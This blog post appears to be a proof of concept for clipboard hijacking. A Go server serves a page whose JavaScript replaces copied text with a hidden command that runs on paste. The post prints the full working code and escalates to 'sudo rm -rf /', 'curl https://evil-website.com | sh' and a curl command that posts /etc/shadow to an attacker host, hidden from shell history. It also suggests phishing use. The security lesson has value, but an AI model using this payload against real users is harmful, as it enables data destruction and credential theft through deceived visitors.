+++
title = "Copy Paste of Death"
date = "2020-10-22T19:33:25+02:00"
author = "ezekiel"
cover = ""
tags = ["hack", "web", "trick", "poc"]
keywords = ["javascript", "html", "golang", "hack", "payload"]
description = "Never trust the commands you copy from the Internets..."
+++

This morning, I found this brief [blog article](https://briantracy.xyz/writing/copy-paste-shell.html) which caught my attention.

To resume, it says that it is possible to trick a user by making him enter a false shell command thanks to a bit of JavaScript. Interesting...

The script is written, but there is no examples... So I built some.

## The proof of concept

The idea is to write a small web server that will serve a HTML page with the script inside.

To write the server, I used Golang which really powerful for this kind of tasks :

```go
package main

import (
	"fmt"
	"html/template"
	"log"
	"net/http"

	"github.com/gorilla/mux"
)

func main() {
	// Creation of a simple web server listening on port 1337.
	srv := &http.Server{
		Addr:    ":1337",
		Handler: handleFunc(),
	}

	fmt.Printf("go to http://localhost%s\n", srv.Addr)

	log.Fatal(srv.ListenAndServe())
}

// handleFunc creates the router.
// Not very useful here as we only have one path.
func handleFunc() *mux.Router {
	r := mux.NewRouter()
	r.HandleFunc("/", homePage)

	return r
}

// home page handler. It parses and executes home.html.
func homePage(w http.ResponseWriter, r *http.Request) {
	tmpl, err := template.ParseFiles("home.html")
	if err != nil {
		log.Fatalf("Can not parse home page : %v", err)
	}

	err = tmpl.Execute(w, nil)
	if err != nil {
		log.Fatalf("Can not execute templates for home page : %v", err)
	}
}
```
I used a router to handle and redirect traffic. This is completely overkill in this situation, given that we only have one road. The server will be listening on `http://localhost:1337`.

Now, we need a HTML page with the evil code inside :
```html
<html>
<h2>You should copy this command in your shell ! :D</h2>
<br>
<br>
<br>
<pre id="copyme" , style="font-size:x-large;">
    $ echo "such a great command!"
</pre>

</html>

<script>
    document.getElementById('copyme').addEventListener('copy', function (e) {
        e.clipboardData.setData('text/plain', 'curl parrot.live\n');
        e.preventDefault();
    });
</script>
```
And here we go ! If you copy the command `echo "such a great command!"` and paste it in your shell, you'll see something... Unexpected.

But what happened ? This is basic HTML/JavaScript :

You can see that the `<pre></pre>` markers have the id "copyme".

So when the user copy it, it triggers the JS script. This code calls `e.clipboardData.setData('text/plain', 'curl parrot.live\n');` which write "curl parrot.live" in the victim's clipboard. That's all. Easy, uh ? :D

Moreover, the presence of \n at the end of the rogue command allow it to execute at the moment of the paste, no need for the victim to press enter !

Well, seeing an epileptic parrot is funny. But what else can we do ?

To be honest, almost anything. Even with superuser privileges ! Imagine :

The victim is following a tutorial on the attacker website. Let's assume the first commands are :
```
$ sudo apt update
```
and
```
$ sudo apt upgrade
```
Those commands looks legit, especially at the beginning of a tutorial.

But when the victim will enter the third command (it can be anything as long as it looks complex enough to exploit the lazyness of the victim), the sudo timeout will surely not have expired, which allow the attacker to execute an evil command with sudo at the beginning, `sudo rm -rf / --no-preserve-root 2> /dev/null` for example ;).

(Don't try this at home plz).

But wiping a hard drive isn't very funny, isn't it ? Let's try something else !

## Weaponization

The first thing we can imagine is to pipe a `curl` to `sh` :
```
curl https://evil-website.com | sh
```
This will take whatever there is on `https://evil-website.com` and send it to a shell.

For example, I created another HTML page called `payload.html` which is served on the road `/payload`. The content of this page is just :
```
sudo cat /etc/shadow
```
I modified `curl parrot.live` to `curl http://localhost:1337/payload`, did a shitty sudo command like `sudo apt update` and then I did the copy/paste.

As expected, the content of `/etc/shadow` appears in my shell. Nice.

Now let's change the command in the JavaScript file to ` sudo curl -d @/etc/shadow https://evil-website.com`. (Note the blank space before sudo, it's to avoid writing the command in the history). This command simply does a POST request to `https://evil-website.com` with the content of your `/etc/shadow` in data. Oops... :D

If you want to try, you can replace the website by `127.0.0.1:4455` and, in another shell, write :
```
$ nc -lnvp 4455
```
The command above open a listener on port 4455 on every interface. Now try to copy the command and you will see your encrypted password appear in your netcat shell.

## This is the end

I agree that this is not elite hacking. However, it's a funny trick that can be used in phishing campaigns or just on a website. It can be funny to create a real site with a real turorial on it as well as an evil command that monitor how many times the visitors got tricked !

If you want to see the code of the [PoC](#the-proof-of-concept), it is available on this [GitHub repository](https://github.com/eze-kiel/copypaste-of-death). Feel free to clone/fork it if you want to play :)

Take care, and remember that hacking is not a crime !

\- ez
